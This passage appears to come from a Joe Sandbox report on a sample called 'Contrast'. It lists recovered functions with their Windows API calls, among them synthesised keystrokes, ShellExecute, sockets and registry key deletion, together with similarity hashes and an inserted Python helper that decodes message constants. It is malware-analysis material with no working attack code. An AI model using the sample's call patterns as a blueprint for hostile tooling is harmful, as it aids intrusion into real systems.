• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 005776CF
• EnterCriticalSection.KERNEL32(?), ref: 005776EB
• _memmove.LIBCMT ref: 00577739
• _memmove.LIBCMT ref: 00577756
• LeaveCriticalSection.KERNEL32(?), ref: 00577765
• ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 0057777A
• InterlockedExchange.KERNEL32(?,000001F6), ref: 00577799
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
• String ID:
• API String ID: 256516436-0
• Opcode ID: 85d22d05e251d2c292e38964eaafad0a2ef1f8254373b273d5236cb55db61018
• Instruction ID: b868fc29667ff6f2f4421572dff2496efaeedf6ce03f45a08cbdc5f2e1dc64bb
• Opcode Fuzzy Hash: 85d22d05e251d2c292e38964eaafad0a2ef1f8254373b273d5236cb55db61018
• Instruction Fuzzy Hash: 41315235904209EBDB14DF64DC89EAEBB78FF85310F1480A5F904AB296D730DA54DB64
APIs
• DeleteObject.GDI32(00000000), ref: 00596810
• GetDC.USER32(00000000), ref: 00596818
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00596823
• ReleaseDC.USER32(00000000,00000000), ref: 0059682F
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0059686B
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0059687C
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0059964F,?,?,000000FF,00000000,?,000000FF,?), ref: 005968B6
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 005968D6
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: fef2d64e824bbdb232d4f43e0adf817a94d56fe0eb27e93a3f140852fb3dfb00
• Instruction ID: bb3e3d8125c1b56feec48b3ebe52dd81001dd5f6492ad3b8403838f336e469d5
• Opcode Fuzzy Hash: fef2d64e824bbdb232d4f43e0adf817a94d56fe0eb27e93a3f140852fb3dfb00
• Instruction Fuzzy Hash: 9B317872211210BFEF108F108C8AFAB3FADFB5A765F040065FE08AA291C6759855CBB0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: _memcmp
• String ID:
• API String ID: 2931989736-0
• Opcode ID: f304b602262842f1bbc4de9cdc2873e5324c3703b7d627de5b01b77f79844cf2
• Instruction ID: 6b26ac2281c492be2ce535d6cfba012c6cb6283e8d71bc30444833c941315c99
• Opcode Fuzzy Hash: f304b602262842f1bbc4de9cdc2873e5324c3703b7d627de5b01b77f79844cf2
• Instruction Fuzzy Hash: 022104727016067B971476628E87FBF3F6CFE62798F048028FD46A7642E710DE11CAA5
APIs
  • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
  • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
  • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
• _wcstok.LIBCMT ref: 0057F2D7
• _wcscpy.LIBCMT ref: 0057F366
• _memset.LIBCMT ref: 0057F399
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
• Opcode ID: 5be727bf4a87ef2cc45d85abada1e42ecb53944d6cf8f49d594988e6accd8de3
• Instruction ID: 95c2ab025eba55e4994fdb9239a2b4da371c0b06ca013196f761eb8db50338c8
• Opcode Fuzzy Hash: 5be727bf4a87ef2cc45d85abada1e42ecb53944d6cf8f49d594988e6accd8de3
• Instruction Fuzzy Hash: 06C1AF715047529FD714EF64E849A5BBFE4BF95310F00892DF899972A2DB30EC45CB82
                                                                                                                                        APIs
                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 005872EB
                                                                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0058730C
                                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0058731F
                                                                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 005873D5
                                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 00587392
                                                                                                                                          • Part of subcall function 0056B4EA: _strlen.LIBCMT ref: 0056B4F4
                                                                                                                                          • Part of subcall function 0056B4EA: _memmove.LIBCMT ref: 0056B516
                                                                                                                                        • _strlen.LIBCMT ref: 0058742F
                                                                                                                                        • _memmove.LIBCMT ref: 00587498
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3619996494-0
                                                                                                                                        • Opcode ID: b491bb7d7641d38eb48d037658ec11d8b7fd1267bf3efbd6a69422ab91c49a4b
                                                                                                                                        • Instruction ID: 4a8acf8e72566b469f64aa04e7e11473776d9e8e0ed758f30062fbd6447b5147
                                                                                                                                        • Opcode Fuzzy Hash: b491bb7d7641d38eb48d037658ec11d8b7fd1267bf3efbd6a69422ab91c49a4b
                                                                                                                                        • Instruction Fuzzy Hash: 4081D371108205ABD710EB24DC89E6BBFA8FFD9714F204918F956AB2E2DB70DD41CB91
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e9f4a077e6d33a3c3d1e4aa14f9073033225d2d137ecc000310d27cef4e02530
                                                                                                                                        • Instruction ID: 19fd308ae820840d16e9e65605ca18f4237456ecd5625aa906dad16c209d1ecc
                                                                                                                                        • Opcode Fuzzy Hash: e9f4a077e6d33a3c3d1e4aa14f9073033225d2d137ecc000310d27cef4e02530
                                                                                                                                        • Instruction Fuzzy Hash: A2715E30900509FFEB04CF58CC49AEE7F79FF86314F148599FA15AA251C730AA91DB64
                                                                                                                                        APIs
                                                                                                                                        • IsWindow.USER32(00FE5C40), ref: 0059BA5D
                                                                                                                                        • IsWindowEnabled.USER32(00FE5C40), ref: 0059BA69
                                                                                                                                        • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0059BB4D
                                                                                                                                        • SendMessageW.USER32(00FE5C40,000000B0,?,?), ref: 0059BB84
                                                                                                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0059BBC1
                                                                                                                                        • GetWindowLongW.USER32(00FE5C40,000000EC), ref: 0059BBE3
                                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0059BBFB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4072528602-0
                                                                                                                                        • Opcode ID: a206292dc4daa3e2c752d4dba05cea49abcff21259502588dde009d17348b1df
                                                                                                                                        • Instruction ID: f04c33bf3bf4ed16e354640b58d273c3110ac543439316ec7a16d105baf94a71
                                                                                                                                        • Opcode Fuzzy Hash: a206292dc4daa3e2c752d4dba05cea49abcff21259502588dde009d17348b1df
                                                                                                                                        • Instruction Fuzzy Hash: 8E71CF34604209AFFF209F54DA94FBA7FB6FF5A300F04445AE94597291C731AD54DB50
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 0058FB31
                                                                                                                                        • _memset.LIBCMT ref: 0058FBFA
                                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 0058FC3F
                                                                                                                                          • Part of subcall function 00514D37: __itow.LIBCMT ref: 00514D62
                                                                                                                                          • Part of subcall function 00514D37: __swprintf.LIBCMT ref: 00514DAC
                                                                                                                                          • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                                                                                                                                        • GetProcessId.KERNEL32(00000000), ref: 0058FCB6
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0058FCE5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                                        • String ID: @
                                                                                                                                        • API String ID: 3522835683-2766056989
                                                                                                                                        • Opcode ID: f680618968d914eb9cacd402c9cca920f15f5322ada197577c3e001e8390834e
                                                                                                                                        • Instruction ID: 840b02af34a83be48a6a5b61794bda785949d5d07a84cecd4aaee891426f6f32
                                                                                                                                        • Opcode Fuzzy Hash: f680618968d914eb9cacd402c9cca920f15f5322ada197577c3e001e8390834e
                                                                                                                                        • Instruction Fuzzy Hash: 30619E74A0061ADFCB14EF54D4999AEBBF4FF89310F108469E846AB351CB30AD81CF94
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(?), ref: 0057178B
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 005717A0
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 00571801
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 0057182F
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0057184E
                                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00571894
                                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 005718B7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                        • Opcode ID: 31ae25816fbcdef1cd1da864dc1988e5091b4c80f3adad20ede4d2869a2c2405
                                                                                                                                        • Instruction ID: 25f03c0c3f1619ba440171e78561b4d822cc73f0e91cc663f03458abecc2b775
                                                                                                                                        • Opcode Fuzzy Hash: 31ae25816fbcdef1cd1da864dc1988e5091b4c80f3adad20ede4d2869a2c2405
                                                                                                                                        • Instruction Fuzzy Hash: 5E51E360904BD53DFB3646389855BBA7EE97B06700F08C589E1DD568C2C294DC88F759
                                                                                                                                        APIs
                                                                                                                                        • GetParent.USER32(00000000), ref: 005715A4
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 005715B9
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 0057161A
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00571646
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00571663
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 005716A7
                                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 005716C8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 87235514-0
                                                                                                                                        • Opcode ID: 68812bbede0404ae5b51a40f2cdf3d0cec30ed8d9a3d12dba4ee8724e2d54fa8
                                                                                                                                        • Instruction ID: 0cdbafd7fbbe2b2a5eeb5e43090565c51afecf161f570c145247a19a5fcd7338
                                                                                                                                        • Opcode Fuzzy Hash: 68812bbede0404ae5b51a40f2cdf3d0cec30ed8d9a3d12dba4ee8724e2d54fa8
                                                                                                                                        • Instruction Fuzzy Hash: 2C5106A0514BD53DFB3687289C45BBA7EA97B46300F0CC589E0DD4A8C2D694EC98FB58
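The two PostMessageW functions above, and the IsWindow/SendMessageW function before them, are listed by Joe Sandbox with raw message and wParam values only. The script below is an added analyst aid, not part of the Joe Sandbox report and not code from the sample: it parses lines in the report's own "APIs" format and annotates the USER32 constants from winuser.h that are certain here (0x0100 WM_KEYDOWN, 0x0101 WM_KEYUP; wParams 0x10 VK_SHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU, 0x5B VK_LWIN; 0x00B0 EM_GETSEL; 0x00A1 WM_NCLBUTTONDOWN with wParam 2 HTCAPTION). Read that way, one function posts presses and the other posts releases of the four modifier keys to the parent window, bracketed by GetKeyboardState/SetKeyboardState, and the IsWindow function sends the WM_NCLBUTTONDOWN/HTCAPTION pair that drags a window as if by its title bar. Message 0x041C is deliberately left undecoded (it sits in the WM_USER range and is control-specific), which also exercises the unknown-constant path; the function and table names are this editor's choices. The sample lines are copied from the report entries above.

```python
"""Annotate Joe Sandbox 'APIs' lines with the USER32 constants they carry.

Added analyst aid; not Joe Sandbox output and not code from the sample.
Input lines follow the report's own format, e.g.
    • PostMessageW.USER32(?,00000101,00000010,?), ref: 0057182F
Arguments are 8 hex digits as printed by the report, or '?' when unknown.
"""
import re
from dataclasses import dataclass, field

# Values from <winuser.h>; only the ones these report entries use.
WINDOW_MESSAGES = {
    0x00A1: "WM_NCLBUTTONDOWN",
    0x00B0: "EM_GETSEL",
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
}
VIRTUAL_KEYS = {
    0x10: "VK_SHIFT",
    0x11: "VK_CONTROL",
    0x12: "VK_MENU",   # Alt
    0x5B: "VK_LWIN",
}
HIT_TEST = {2: "HTCAPTION"}

# <api>.<module>(<args>), ref: <addr>, optionally prefixed with
# "Part of subcall function XXXXXXXX:" as the report does for callees.
LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list            # int for known values, None for '?'
    ref: int              # call-site address from the report
    notes: list = field(default_factory=list)


def parse_api_line(line):
    """Return an ApiCall for a report line, or None for lines without an argument list."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [None if a.strip() == "?" else int(a, 16)
            for a in m["args"].split(",") if a.strip()]
    return ApiCall(m["api"], m["mod"], args, int(m["ref"], 16))


def annotate(call):
    """Attach symbolic names for the message and wParam of Post/SendMessage calls."""
    if call.api in ("PostMessageW", "SendMessageW", "PostMessageA", "SendMessageA") \
            and len(call.args) >= 3:
        msg, wparam = call.args[1], call.args[2]
        if msg is not None:
            call.notes.append(WINDOW_MESSAGES.get(msg, f"unknown message 0x{msg:04X}"))
        if msg in (0x0100, 0x0101) and wparam is not None:
            call.notes.append(VIRTUAL_KEYS.get(wparam, f"unknown VK 0x{wparam:02X}"))
        if msg == 0x00A1 and wparam is not None:
            call.notes.append(HIT_TEST.get(wparam, f"unknown hit-test code {wparam}"))
    return call


def summarize(lines):
    """Parse and annotate a block of report lines; returns the list of ApiCall objects."""
    return [annotate(c) for c in map(parse_api_line, lines) if c is not None]


def synthesized_keys(calls):
    """(message name, key name) for every keystroke posted with PostMessage*."""
    out = []
    for c in calls:
        if c.api.startswith("PostMessage") and len(c.args) >= 3 \
                and c.args[1] in (0x0100, 0x0101) and c.args[2] is not None:
            out.append((WINDOW_MESSAGES[c.args[1]],
                        VIRTUAL_KEYS.get(c.args[2], f"0x{c.args[2]:02X}")))
    return out


# Lines copied from the report entries above (WM_KEYUP function and IsWindow function).
REPORT_LINES = """
• GetParent.USER32(?), ref: 0057178B
• GetKeyboardState.USER32(?), ref: 005717A0
• SetKeyboardState.USER32(?), ref: 00571801
• PostMessageW.USER32(?,00000101,00000010,?), ref: 0057182F
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0057184E
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00571894
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 005718B7
• SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 0059BB4D
• SendMessageW.USER32(00FE5C40,000000B0,?,?), ref: 0059BB84
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0059BBFB
""".strip().splitlines()

if __name__ == "__main__":
    for c in summarize(REPORT_LINES):
        print(f"{c.api:18s} @ {c.ref:08X}  {', '.join(c.notes) or '-'}")
```

Paste any other "APIs" block from this report into REPORT_LINES to decode it the same way; lines without an argument list (the LIBCMT entries) and ordinal-only imports such as `#17.WSOCK32` are skipped rather than misparsed, and unknown messages are reported as such instead of being guessed.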
                                                                                                                                        APIs
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
• Opcode ID: aadab7085a69d55ed7698db92684b1f1b56000f7197b9795f0903ef63907076c
• Instruction ID: 4ac147de0e69fec063bf078fd6fda601bfb8b173a511e8a8ca995cf491ff9f25
• Opcode Fuzzy Hash: aadab7085a69d55ed7698db92684b1f1b56000f7197b9795f0903ef63907076c
• Instruction Fuzzy Hash: D5419F65C2061975CB11FBB4C84AACFBBBCBF45310F508856F519E3122F634A71587A5
APIs
  • Part of subcall function 00574BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00573B8A,?), ref: 00574BE0
  • Part of subcall function 00574BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00573B8A,?), ref: 00574BF9
• lstrcmpiW.KERNEL32(?,?), ref: 00573BAA
• _wcscmp.LIBCMT ref: 00573BC6
• MoveFileW.KERNEL32(?,?), ref: 00573BDE
• _wcscat.LIBCMT ref: 00573C26
• SHFileOperationW.SHELL32(?), ref: 00573C92
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
• String ID: \*.*
• API String ID: 1377345388-1173974218
• Opcode ID: 151ae3466fa538c1fd334b30969f8e950329c483d3e725a91edcf752cea7edce
• Instruction ID: 68a471e8f8b49df8cc4683bbf0adca0df23db93001fcf56a273412a75f8fcf45
• Opcode Fuzzy Hash: 151ae3466fa538c1fd334b30969f8e950329c483d3e725a91edcf752cea7edce
• Instruction Fuzzy Hash: F5417D7140C3459AC752EF64E445ADBBBECBF89350F40592EF48DC3191EB34D688AB52
APIs
• _memset.LIBCMT ref: 005978CF
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00597976
• IsMenu.USER32(?), ref: 0059798E
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005979D6
• DrawMenuBar.USER32 ref: 005979E9
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
Similarity
• API ID: Menu$Item$DrawInfoInsert_memset
• String ID: 0
• API String ID: 3866635326-4108050209
• Opcode ID: fdf33565cf9ac922315ad44a2edfb3084022a0c5c534d56692f989bafc89914f
• Instruction ID: 578fdcca70629657ab24fb6f1c5a2580e4193795c07f2b2bdfa91e28caeacdac
• Opcode Fuzzy Hash: fdf33565cf9ac922315ad44a2edfb3084022a0c5c534d56692f989bafc89914f
• Instruction Fuzzy Hash: 5D416775A18209EFDF20DF54D884EAABBF9FB0A310F04812AE9559B250D734AD54DFA0
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00591631
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0059165B
• FreeLibrary.KERNEL32(00000000), ref: 00591712
  • Part of subcall function 00591602: RegCloseKey.ADVAPI32(?), ref: 00591678
  • Part of subcall function 00591602: FreeLibrary.KERNEL32(?), ref: 005916CA
  • Part of subcall function 00591602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 005916ED
• RegDeleteKeyW.ADVAPI32(?,?), ref: 005916B5
Memory Dump Source
• Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
• Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmp
